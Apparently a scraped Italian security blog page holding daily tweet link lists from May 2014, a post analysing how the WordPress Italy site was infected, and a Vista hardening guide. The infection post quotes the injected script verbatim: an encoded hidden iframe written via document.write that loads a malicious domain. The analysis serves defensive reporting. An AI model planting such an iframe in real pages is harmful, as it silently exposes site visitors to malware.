- PHP Next Generation http://t.co/ohA7tNNDXK ->
- Did an undisclosed SMF 2.0.6 flaw enable the AVAST forum breach? http://t.co/1vqEaABaUg ->
- UPlay server errors lock some players out of Watch Dogs on launch day http://t.co/ZcnukSobaH ->
- Avast forums hacked http://t.co/MVc5CXl5sB ->
- Zeus-Carberp Hybrid Trojan Pops Up http://t.co/0UbBgv0flc ->
- DOS Deflate: Layer 7 DOS Protection Tool http://t.co/L9sZCpdkx7 ->
- Kali linux 1.0.7 released http://t.co/VEV3vBWJsV ->
- Torrentz.eu Domain Name Suspended http://t.co/0FPryIli3O ->
- Perl 5.20.0 released http://t.co/kTC2WZcHBK ->
- Microsoft warns against Windows XP security update hack http://t.co/tm2PA5qCxA ->
- Unsafe cookies leave WordPress accounts open to hijacking, 2-factor bypass http://t.co/2yG3Bj9Cli ->
sicurezza
Tweet del giorno 2014-05-26
- Porteus Kiosk Edition Is an Operating System Based on Slackware and Firefox http://t.co/RO5Ts2brvY ->
- Apple Thunderbolt Driver Might Be Added To Linux http://t.co/f4zTIT4GGY ->
- Bug In DOS-Based Voting Machines Disrupts Belgian Election http://t.co/KUnogFRtTs ->
- AVAST forum offline due to attack http://t.co/ezyGqAPB7X ->
- Registry Hack: Get Windows XP Security Updates until 2019 http://t.co/8BBRPyZo0u ->
- #Nginx has replaced Apache as the most used web server among the top 10,000 sites https://t.co/IY996L5QOp ->
- New XSS vuln hits eBay as rubbish passw0rds persist http://t.co/D24sHnOd7q ->
- Moscrack – Cluster Cracking Tool For WPA Keys http://t.co/RtvTglWZEw ->
- Mapping commands from IDA pro to Ollydbg http://t.co/Ebtx6V2SaM ->
- useful plugin for #WordPress that emails you whenever a change to a post or page is made > Email Post Changes http://t.co/NBXCsEHytC ->
- Gmail phishing webpage just arrived in my inbox (not identified by @gmail ): http://t.co/rZzPumntSg ->
- Corrado Clini arrestato per peculato. Ex ministro dell’Ambiente ai domiciliari http://t.co/Ly9QWSR33R via @fattoquotidiano ->
Tweet del giorno 2014-05-25
- RT @jedisct1: RT @allmacworld: Apple neglects to renew SSL certificate, breaks Software Update in the process http://t.co/03FHWPRAhX ->
- I've just bought a new toy for my WiFi toolbox, a 9 dbi omnidirectional antenna by Alfa 😉 ->
- I'm at Auditorium Parco della Musica – @auditoriumpdm (Roma, RM) http://t.co/6eD4ecQHWC ->
- Ubuntu 14.10 Utopic Unicorn Now Uses Kernel 3.15 RC5 http://t.co/23i8lylT33 ->
- US may block visas for Chinese hackers attending DefCon, Black Hat http://t.co/u034YT6ghX ->
Tweet del giorno
- RT @Raspberry_Pi: Build an All-In-One Raspberry-Pi Powered Portable PC http://t.co/5hwewyGyqA ->
- RT @DavideMercati: Gli stitici sono persone fortunate. Raramente hanno giornate di merda. ->
- RT @runasand: Make no mistake, @Snapchat lied to make you believe your photos would disappear forever: http://t.co/EhCTxPu8O0 ->
- The future of 3D printing is a machine that makes pancakes http://t.co/AiSFBXPLox via @dailydot ->
- Technical Analysis of CVE-2014-0515 Adobe Flash Player Exploit http://t.co/uSDaNJNNzB ->
- GCC 4.8.3 Compiler Released http://t.co/k2ANKir1P1 ->
- 9m.no – Ridiculously short URLs for the Unicode Age http://t.co/UW5JrOq7sb ->
- Onionshare – Securely share a file of any size using Tor https://t.co/BbGZQwjfFb ->
- PDFium: Chrome’s PDF rendering engine is now open-source https://t.co/lrKzPd7Lg9 ->
Tweet del giorno 2014-05-23
- ‘Hack-proof’ drone revealed by Pentagon http://t.co/UNb8gOZ03Z ->
- RT @wikileaks: #WikiLeaks reveals name of #NSA's target country X below: #Afghanistan http://t.co/ELFXLWXmv1 http://t.co/ohK23mtcK6 ->
- Your eBay Credentials For Sale? How, Where And Why http://t.co/yF7RwZSbXW ->
- Darpa Is Weaponizing Oculus Rift for Cyberwar http://t.co/ZeQ9gAu4BL ->
- Attack of the clones: Fake Antivirus penetrates the App stores http://t.co/3Q89PBMi7T ->
- Sophisticated Google Drive Phishing Scam is becoming popular http://t.co/BVhWUvbAkz ->
- Apple’s online store now offers free shipping on everything http://t.co/yJrb00WRYn ->
- HP’s latest quad-core tablet costs less than $100 http://t.co/VhvS2a39Zg ->
- Using Go with MariaDB http://t.co/nh8uUaw7fF ->
WordPress Italy è stato infettato
Questa mattina mi sono accorto per caso che nelle SERP di Google il sito www.wordpress-it.it, cioè WordPress Italy, risulta segnalato come sito infetto. Ecco la SERP di Google con evidenziato il messaggio “Questo sito potrebbe arrecare danni al tuo computer”:
Andando ad analizzare il sorgente del sito con Malzilla, utile per scaricare in modo sicuro il sito senza navigarci, appare chiaro come il problema risieda in un iframe che reindirizza al dominio vosstaniecorpov.com. Questo è l’iframe iniettato su WordPress Italy:
enc = "%3Ciframe%20src%3D%27http%3A//vosstaniecorpov.com/in.php%27%20width%3D%271%27%20height%3D%271%27%20frameborder%3D%270%27%3E%3C/iframe%3E"; dec = unescape(enc); document.write(dec);
Con una macchina virtuale ho navigato il sito con Firefox (6.0.2) e vengono effettuate anche delle chiamate a http://daitetrafu.com, segnalato anch’esso come sito malevolo (anche se stranamente non da VirusTotal ma solo dalla funzione di riconoscimento siti nocivi di Firefox e di Chrome) come si vede in figura:
Difficile capire al momento quale sia la falla che è stata sfruttata dagli attaccanti, probabile ci sia una vulnerabilità nel tema usato da WordPress Italy oppure in qualche plugin dato che la versione di WordPress utilizzata è la 3.3 leggendo il file http://www.wordpress-it.it/readme.html.
Aumentare la sicurezza di Windows Vista Home Premium
In Vista Home Premium non sono presenti degli strumenti molto utili a impostare policy di sicurezza per il sistema: secpol.msc e gpedit.msc. Molte delle impostazioni permesse dai due tool sono possibili andando a modificare il registro di sistema con regedit ma non è un metodo molto veloce e soprattutto bisogna sapere bene cosa si fa, pena il malfunzionamento del sistema.
Ecco perché possono essere utili due tool freeware che permettano di avere un controllo avanzato della sicurezza del sistema: Ultimate Windows Tweaker e polsedit. Il primo è un programma in grado di cambiare a proprio piacimento molti settaggi di Vista (un po’ come avviene con programmi tipo TweakVI) ma a differenza di molti tweaker è un singolo eseguibile che non necessita installazione, ha un’interfaccia davvero semplice e consente un hardening di Vista efficace.
Nella sezione “Security” di Ultimate Windows Tweaker si può intervenire su molti parametri: è possibile disabilitare regedit, il Pannello di Controllo, il prompt dei comandi, il task manager, si possono disabilitare moltissime applicazioni (es. Windows Mail o Windows Firewall) ed disattivare gli aggiornamenti di sistema.
Per quanto riguarda invece polsedit si tratta anche in questo caso di un singolo eseguibile che offre un’interfaccia molto simile a secpol e un grado di security hardening avanzato. Selezionando “User Right Assignment” è possibile intervenire sui permessi utente. Per ogni azione si possono definire utenti o gruppi abilitati a compiere quello specifico task.
Insomma due freeware davvero molto utili, inoltre Ultimate Windows Tweaker può essere apprezzato oltre che per le funzioni di sicurezza anche per le moltissime personalizzazioni applicabili a Vista.